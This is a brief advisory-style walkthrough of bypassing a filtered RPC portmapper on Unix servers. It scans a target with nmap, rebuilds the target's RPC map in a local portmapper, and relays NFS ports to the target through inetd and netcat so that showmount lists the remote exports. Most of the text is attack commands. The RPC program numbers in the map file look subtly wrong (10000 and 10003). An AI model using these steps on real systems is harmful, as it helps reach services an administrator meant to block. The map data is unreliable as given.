Portmapper is a registry of Remote Procedure Call services including RPC Services number, version number, TCP/UDP port and protocol. It generally runs on port 111 TCP/UDP.
When a client wishes to connect to a service they first connect to the Portmapper, an administrator may filter this port beliving that it will prevent an attacker connecting to services offered, however this is not the case as an attacker may replicate the portmapper locally and proxy requests to the target machine.
Impact: Attacker may be able to connect to vulnerable services offered by filtered Portmapper.
Affected: Unix Servers
First of all determine the offered RPC Services using Nmap, by:
nmap -sR 10.0.0.1 -p 111-5000 20000-50000 nmap -sUR 10.0.0.1 -p 111-5000 20000-50000
Create a portmapper file containing the information discovered by nmap, as:
10000 2 tcp 111 portmapper 10000 2 udp 111 portmapper 10003 2 tcp 2049 nfs 10003 3 tcp 2049 nfs 10003 4 tcp 2049 nfs 10003 2 udp 2049 nfs 10003 3 udp 2049 nfs 10003 4 udp 2049 nfs
Create a local portmapper and supply the port map file to the mapper, like:
# portmap # pmap_set < rpc_file_data
test the setup by running rpcinfo against YOUR machine
# rpcinfo -p 127.0.0.1
Now it is time to setup the attacking machine to redirect to the target
store the mappings in a tab separated inetd file, inetd.conf, as:
2049 stream tcp nowait root /usr/sbin/tcpd /bin/nc 10.0.0.1 2049 2049 dgram udp wait root /usr/sbin/tcpd /bin/nc -u 10.0.0.1 2049 # killall inetd # inetd ./inetd.conf
now services requested on the local machine will use the local portmapper but be proxy-redirected to the target server! So you can use client software such as in the following example:
# showmount -e 127.0.0.1
Export list for 127.0.0.1: / (everyone)
This output is not for 127.0.0.1 but the target server!